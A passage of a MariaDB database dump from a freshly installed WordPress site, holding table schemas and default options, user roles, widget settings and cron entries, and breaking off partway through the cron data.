-- MariaDB dump 10.19 Distrib 10.6.17-MariaDB, for Linux (x86_64) -- -- Host: localhost Database: tummmyov_wp40 -- ------------------------------------------------------ -- Server version 10.6.17-MariaDB-cll-lve /*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */; /*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */; /*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */; /*!40101 SET NAMES utf8mb4 */; /*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */; /*!40103 SET TIME_ZONE='+00:00' */; /*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */; /*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */; /*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */; /*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */; -- -- Table structure for table `wpmd_commentmeta` -- DROP TABLE IF EXISTS `wpmd_commentmeta`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpmd_commentmeta` ( `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `comment_id` bigint(20) unsigned NOT NULL DEFAULT 0, `meta_key` varchar(255) DEFAULT NULL, `meta_value` longtext DEFAULT NULL, PRIMARY KEY (`meta_id`), KEY `comment_id` (`comment_id`), KEY `meta_key` (`meta_key`(191)) ) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpmd_commentmeta` -- LOCK TABLES `wpmd_commentmeta` WRITE; /*!40000 ALTER TABLE `wpmd_commentmeta` DISABLE KEYS */; /*!40000 ALTER TABLE `wpmd_commentmeta` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpmd_comments` -- DROP TABLE IF EXISTS `wpmd_comments`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpmd_comments` ( `comment_ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `comment_post_ID` bigint(20) unsigned NOT NULL DEFAULT 0, `comment_author` tinytext NOT NULL, `comment_author_email` varchar(100) NOT NULL DEFAULT '', `comment_author_url` varchar(200) NOT NULL DEFAULT '', `comment_author_IP` varchar(100) NOT NULL DEFAULT '', `comment_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `comment_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `comment_content` text NOT NULL, `comment_karma` int(11) NOT NULL DEFAULT 0, `comment_approved` varchar(20) NOT NULL DEFAULT '1', `comment_agent` varchar(255) NOT NULL DEFAULT '', `comment_type` varchar(20) NOT NULL DEFAULT '', `comment_parent` bigint(20) unsigned NOT NULL DEFAULT 0, `user_id` bigint(20) unsigned NOT NULL DEFAULT 0, PRIMARY KEY (`comment_ID`), KEY `comment_post_ID` (`comment_post_ID`), KEY `comment_approved_date_gmt` (`comment_approved`,`comment_date_gmt`), KEY `comment_date_gmt` (`comment_date_gmt`), KEY `comment_parent` (`comment_parent`), KEY `comment_author_email` (`comment_author_email`(10)) ) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpmd_comments` -- LOCK TABLES `wpmd_comments` WRITE; /*!40000 ALTER TABLE `wpmd_comments` DISABLE KEYS */; INSERT INTO `wpmd_comments` (`comment_ID`, `comment_post_ID`, `comment_author`, `comment_author_email`, `comment_author_url`, `comment_author_IP`, `comment_date`, `comment_date_gmt`, `comment_content`, `comment_karma`, `comment_approved`, `comment_agent`, `comment_type`, `comment_parent`, `user_id`) VALUES (1,1,'A WordPress Commenter','wapuu@wordpress.example','https://wordpress.org/','','2020-05-05 07:24:57','2020-05-05 07:24:57','Hi, this is a comment.\nTo get started with moderating, editing, and deleting comments, please visit the Comments screen in the dashboard.\nCommenter avatars come from Gravatar.',0,'1','','',0,0); /*!40000 ALTER TABLE `wpmd_comments` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpmd_links` -- DROP TABLE IF EXISTS `wpmd_links`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpmd_links` ( `link_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `link_url` varchar(255) NOT NULL DEFAULT '', `link_name` varchar(255) NOT NULL DEFAULT '', `link_image` varchar(255) NOT NULL DEFAULT '', `link_target` varchar(25) NOT NULL DEFAULT '', `link_description` varchar(255) NOT NULL DEFAULT '', `link_visible` varchar(20) NOT NULL DEFAULT 'Y', `link_owner` bigint(20) unsigned NOT NULL DEFAULT 1, `link_rating` int(11) NOT NULL DEFAULT 0, `link_updated` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `link_rel` varchar(255) NOT NULL DEFAULT '', `link_notes` mediumtext NOT NULL, `link_rss` varchar(255) NOT NULL DEFAULT '', PRIMARY KEY (`link_id`), KEY `link_visible` (`link_visible`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpmd_links` -- LOCK TABLES `wpmd_links` WRITE; /*!40000 ALTER TABLE `wpmd_links` DISABLE KEYS */; /*!40000 ALTER TABLE `wpmd_links` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpmd_options` -- DROP TABLE IF EXISTS `wpmd_options`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpmd_options` ( `option_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `option_name` varchar(191) NOT NULL DEFAULT '', `option_value` longtext NOT NULL, `autoload` varchar(20) NOT NULL DEFAULT 'yes', PRIMARY KEY (`option_id`), UNIQUE KEY `option_name` (`option_name`), KEY `autoload` (`autoload`) ) ENGINE=MyISAM AUTO_INCREMENT=145 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpmd_options` -- LOCK TABLES `wpmd_options` WRITE; /*!40000 ALTER TABLE `wpmd_options` DISABLE KEYS */; INSERT INTO `wpmd_options` (`option_id`, `option_name`, `option_value`, `autoload`) VALUES (1,'siteurl','https://tummyrevolution.com','yes'),(2,'home','https://tummyrevolution.com','yes'),(3,'blogname','My Blog','yes'),(4,'blogdescription','My WordPress Blog','yes'),(5,'users_can_register','0','yes'),(6,'admin_email','admin@tummyrevolution.com','yes'),(7,'start_of_week','1','yes'),(8,'use_balanceTags','0','yes'),(9,'use_smilies','1','yes'),(10,'require_name_email','1','yes'),(11,'comments_notify','1','yes'),(12,'posts_per_rss','10','yes'),(13,'rss_use_excerpt','0','yes'),(14,'mailserver_url','mail.example.com','yes'),(15,'mailserver_login','login@example.com','yes'),(16,'mailserver_pass','password','yes'),(17,'mailserver_port','110','yes'),(18,'default_category','1','yes'),(19,'default_comment_status','open','yes'),(20,'default_ping_status','open','yes'),(21,'default_pingback_flag','1','yes'),(22,'posts_per_page','10','yes'),(23,'date_format','F j, Y','yes'),(24,'time_format','g:i a','yes'),(25,'links_updated_date_format','F j, Y g:i a','yes'),(26,'comment_moderation','0','yes'),(27,'moderation_notify','1','yes'),(28,'permalink_structure','/%year%/%monthnum%/%day%/%postname%/','yes'),(29,'rewrite_rules','a:91:{s:11:\"^wp-json/?$\";s:22:\"index.php?rest_route=/\";s:14:\"^wp-json/(.*)?\";s:33:\"index.php?rest_route=/$matches[1]\";s:21:\"^index.php/wp-json/?$\";s:22:\"index.php?rest_route=/\";s:24:\"^index.php/wp-json/(.*)?\";s:33:\"index.php?rest_route=/$matches[1]\";s:47:\"category/(.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:42:\"category/(.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:23:\"category/(.+?)/embed/?$\";s:46:\"index.php?category_name=$matches[1]&embed=true\";s:35:\"category/(.+?)/page/?([0-9]{1,})/?$\";s:53:\"index.php?category_name=$matches[1]&paged=$matches[2]\";s:17:\"category/(.+?)/?$\";s:35:\"index.php?category_name=$matches[1]\";s:44:\"tag/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:39:\"tag/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:20:\"tag/([^/]+)/embed/?$\";s:36:\"index.php?tag=$matches[1]&embed=true\";s:32:\"tag/([^/]+)/page/?([0-9]{1,})/?$\";s:43:\"index.php?tag=$matches[1]&paged=$matches[2]\";s:14:\"tag/([^/]+)/?$\";s:25:\"index.php?tag=$matches[1]\";s:45:\"type/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:40:\"type/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:21:\"type/([^/]+)/embed/?$\";s:44:\"index.php?post_format=$matches[1]&embed=true\";s:33:\"type/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?post_format=$matches[1]&paged=$matches[2]\";s:15:\"type/([^/]+)/?$\";s:33:\"index.php?post_format=$matches[1]\";s:12:\"robots\\.txt$\";s:18:\"index.php?robots=1\";s:13:\"favicon\\.ico$\";s:19:\"index.php?favicon=1\";s:48:\".*wp-(atom|rdf|rss|rss2|feed|commentsrss2)\\.php$\";s:18:\"index.php?feed=old\";s:20:\".*wp-app\\.php(/.*)?$\";s:19:\"index.php?error=403\";s:18:\".*wp-register.php$\";s:23:\"index.php?register=true\";s:32:\"feed/(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:27:\"(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:8:\"embed/?$\";s:21:\"index.php?&embed=true\";s:20:\"page/?([0-9]{1,})/?$\";s:28:\"index.php?&paged=$matches[1]\";s:41:\"comments/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:36:\"comments/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:17:\"comments/embed/?$\";s:21:\"index.php?&embed=true\";s:44:\"search/(.+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:39:\"search/(.+)/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:20:\"search/(.+)/embed/?$\";s:34:\"index.php?s=$matches[1]&embed=true\";s:32:\"search/(.+)/page/?([0-9]{1,})/?$\";s:41:\"index.php?s=$matches[1]&paged=$matches[2]\";s:14:\"search/(.+)/?$\";s:23:\"index.php?s=$matches[1]\";s:47:\"author/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:42:\"author/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:23:\"author/([^/]+)/embed/?$\";s:44:\"index.php?author_name=$matches[1]&embed=true\";s:35:\"author/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?author_name=$matches[1]&paged=$matches[2]\";s:17:\"author/([^/]+)/?$\";s:33:\"index.php?author_name=$matches[1]\";s:69:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:64:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:45:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/embed/?$\";s:74:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&embed=true\";s:57:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:81:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&paged=$matches[4]\";s:39:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/?$\";s:63:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]\";s:56:\"([0-9]{4})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:51:\"([0-9]{4})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:32:\"([0-9]{4})/([0-9]{1,2})/embed/?$\";s:58:\"index.php?year=$matches[1]&monthnum=$matches[2]&embed=true\";s:44:\"([0-9]{4})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:65:\"index.php?year=$matches[1]&monthnum=$matches[2]&paged=$matches[3]\";s:26:\"([0-9]{4})/([0-9]{1,2})/?$\";s:47:\"index.php?year=$matches[1]&monthnum=$matches[2]\";s:43:\"([0-9]{4})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:38:\"([0-9]{4})/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:19:\"([0-9]{4})/embed/?$\";s:37:\"index.php?year=$matches[1]&embed=true\";s:31:\"([0-9]{4})/page/?([0-9]{1,})/?$\";s:44:\"index.php?year=$matches[1]&paged=$matches[2]\";s:13:\"([0-9]{4})/?$\";s:26:\"index.php?year=$matches[1]\";s:58:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:68:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:88:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:83:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:83:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:64:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:53:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/embed/?$\";s:91:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&embed=true\";s:57:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/trackback/?$\";s:85:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&tb=1\";s:77:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:97:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&feed=$matches[5]\";s:72:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:97:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&feed=$matches[5]\";s:65:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/page/?([0-9]{1,})/?$\";s:98:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&paged=$matches[5]\";s:72:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/comment-page-([0-9]{1,})/?$\";s:98:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&cpage=$matches[5]\";s:61:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)(?:/([0-9]+))?/?$\";s:97:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&page=$matches[5]\";s:47:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:57:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:77:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:72:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:72:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:53:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:64:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/comment-page-([0-9]{1,})/?$\";s:81:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&cpage=$matches[4]\";s:51:\"([0-9]{4})/([0-9]{1,2})/comment-page-([0-9]{1,})/?$\";s:65:\"index.php?year=$matches[1]&monthnum=$matches[2]&cpage=$matches[3]\";s:38:\"([0-9]{4})/comment-page-([0-9]{1,})/?$\";s:44:\"index.php?year=$matches[1]&cpage=$matches[2]\";s:27:\".?.+?/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:37:\".?.+?/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:57:\".?.+?/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:33:\".?.+?/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:16:\"(.?.+?)/embed/?$\";s:41:\"index.php?pagename=$matches[1]&embed=true\";s:20:\"(.?.+?)/trackback/?$\";s:35:\"index.php?pagename=$matches[1]&tb=1\";s:40:\"(.?.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:35:\"(.?.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:28:\"(.?.+?)/page/?([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&paged=$matches[2]\";s:35:\"(.?.+?)/comment-page-([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&cpage=$matches[2]\";s:24:\"(.?.+?)(?:/([0-9]+))?/?$\";s:47:\"index.php?pagename=$matches[1]&page=$matches[2]\";}','yes'),(30,'hack_file','0','yes'),(31,'blog_charset','UTF-8','yes'),(32,'moderation_keys','','no'),(33,'active_plugins','a:1:{i:0;s:33:\"w3-total-cache/w3-total-cache.php\";}','yes'),(34,'category_base','','yes'),(35,'ping_sites','http://rpc.pingomatic.com/','yes'),(36,'comment_max_links','2','yes'),(37,'gmt_offset','0','yes'),(38,'default_email_category','1','yes'),(39,'recently_edited','','no'),(40,'template','twentytwenty','yes'),(41,'stylesheet','twentytwenty','yes'),(42,'comment_whitelist','1','yes'),(43,'blacklist_keys','','no'),(44,'comment_registration','0','yes'),(45,'html_type','text/html','yes'),(46,'use_trackback','0','yes'),(47,'default_role','subscriber','yes'),(48,'db_version','47018','yes'),(49,'uploads_use_yearmonth_folders','1','yes'),(50,'upload_path','','yes'),(51,'blog_public','1','yes'),(52,'default_link_category','2','yes'),(53,'show_on_front','posts','yes'),(54,'tag_base','','yes'),(55,'show_avatars','1','yes'),(56,'avatar_rating','G','yes'),(57,'upload_url_path','','yes'),(58,'thumbnail_size_w','150','yes'),(59,'thumbnail_size_h','150','yes'),(60,'thumbnail_crop','1','yes'),(61,'medium_size_w','300','yes'),(62,'medium_size_h','300','yes'),(63,'avatar_default','mystery','yes'),(64,'large_size_w','1024','yes'),(65,'large_size_h','1024','yes'),(66,'image_default_link_type','none','yes'),(67,'image_default_size','','yes'),(68,'image_default_align','','yes'),(69,'close_comments_for_old_posts','0','yes'),(70,'close_comments_days_old','14','yes'),(71,'thread_comments','1','yes'),(72,'thread_comments_depth','5','yes'),(73,'page_comments','0','yes'),(74,'comments_per_page','50','yes'),(75,'default_comments_page','newest','yes'),(76,'comment_order','asc','yes'),(77,'sticky_posts','a:0:{}','yes'),(78,'widget_categories','a:2:{i:2;a:4:{s:5:\"title\";s:0:\"\";s:5:\"count\";i:0;s:12:\"hierarchical\";i:0;s:8:\"dropdown\";i:0;}s:12:\"_multiwidget\";i:1;}','yes'),(79,'widget_text','a:0:{}','yes'),(80,'widget_rss','a:0:{}','yes'),(81,'uninstall_plugins','a:0:{}','no'),(82,'timezone_string','','yes'),(83,'page_for_posts','0','yes'),(84,'page_on_front','0','yes'),(85,'default_post_format','0','yes'),(86,'link_manager_enabled','0','yes'),(87,'finished_splitting_shared_terms','1','yes'),(88,'site_icon','0','yes'),(89,'medium_large_size_w','768','yes'),(90,'medium_large_size_h','0','yes'),(91,'wp_page_for_privacy_policy','3','yes'),(92,'show_comments_cookies_opt_in','1','yes'),(93,'admin_email_lifespan','1604215497','yes'),(94,'initial_db_version','47018','yes'),(95,'wpmd_user_roles','a:5:{s:13:\"administrator\";a:2:{s:4:\"name\";s:13:\"Administrator\";s:12:\"capabilities\";a:61:{s:13:\"switch_themes\";b:1;s:11:\"edit_themes\";b:1;s:16:\"activate_plugins\";b:1;s:12:\"edit_plugins\";b:1;s:10:\"edit_users\";b:1;s:10:\"edit_files\";b:1;s:14:\"manage_options\";b:1;s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:6:\"import\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:8:\"level_10\";b:1;s:7:\"level_9\";b:1;s:7:\"level_8\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:12:\"delete_users\";b:1;s:12:\"create_users\";b:1;s:17:\"unfiltered_upload\";b:1;s:14:\"edit_dashboard\";b:1;s:14:\"update_plugins\";b:1;s:14:\"delete_plugins\";b:1;s:15:\"install_plugins\";b:1;s:13:\"update_themes\";b:1;s:14:\"install_themes\";b:1;s:11:\"update_core\";b:1;s:10:\"list_users\";b:1;s:12:\"remove_users\";b:1;s:13:\"promote_users\";b:1;s:18:\"edit_theme_options\";b:1;s:13:\"delete_themes\";b:1;s:6:\"export\";b:1;}}s:6:\"editor\";a:2:{s:4:\"name\";s:6:\"Editor\";s:12:\"capabilities\";a:34:{s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;}}s:6:\"author\";a:2:{s:4:\"name\";s:6:\"Author\";s:12:\"capabilities\";a:10:{s:12:\"upload_files\";b:1;s:10:\"edit_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;s:22:\"delete_published_posts\";b:1;}}s:11:\"contributor\";a:2:{s:4:\"name\";s:11:\"Contributor\";s:12:\"capabilities\";a:5:{s:10:\"edit_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;}}s:10:\"subscriber\";a:2:{s:4:\"name\";s:10:\"Subscriber\";s:12:\"capabilities\";a:2:{s:4:\"read\";b:1;s:7:\"level_0\";b:1;}}}','yes'),(96,'fresh_site','1','yes'),(97,'widget_search','a:2:{i:2;a:1:{s:5:\"title\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),(98,'widget_recent-posts','a:2:{i:2;a:2:{s:5:\"title\";s:0:\"\";s:6:\"number\";i:5;}s:12:\"_multiwidget\";i:1;}','yes'),(99,'widget_recent-comments','a:2:{i:2;a:2:{s:5:\"title\";s:0:\"\";s:6:\"number\";i:5;}s:12:\"_multiwidget\";i:1;}','yes'),(100,'widget_archives','a:2:{i:2;a:3:{s:5:\"title\";s:0:\"\";s:5:\"count\";i:0;s:8:\"dropdown\";i:0;}s:12:\"_multiwidget\";i:1;}','yes'),(101,'widget_meta','a:2:{i:2;a:1:{s:5:\"title\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),(102,'sidebars_widgets','a:4:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:3:{i:0;s:8:\"search-2\";i:1;s:14:\"recent-posts-2\";i:2;s:17:\"recent-comments-2\";}s:9:\"sidebar-2\";a:3:{i:0;s:10:\"archives-2\";i:1;s:12:\"categories-2\";i:2;s:6:\"meta-2\";}s:13:\"array_version\";i:3;}','yes'),(103,'cron','a:6:{i:1588670697;a:1:{s:34:\"wp_privacy_delete_old_export_files\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1588706697;a:3:{s:16:\"wp_version_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:17:\"wp_update_plugins\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:16:\"wp_update_themes\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1588749897;a:2:{s:30:\"wp_site_health_scheduled_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"weekly\";s:4:\"args\";a: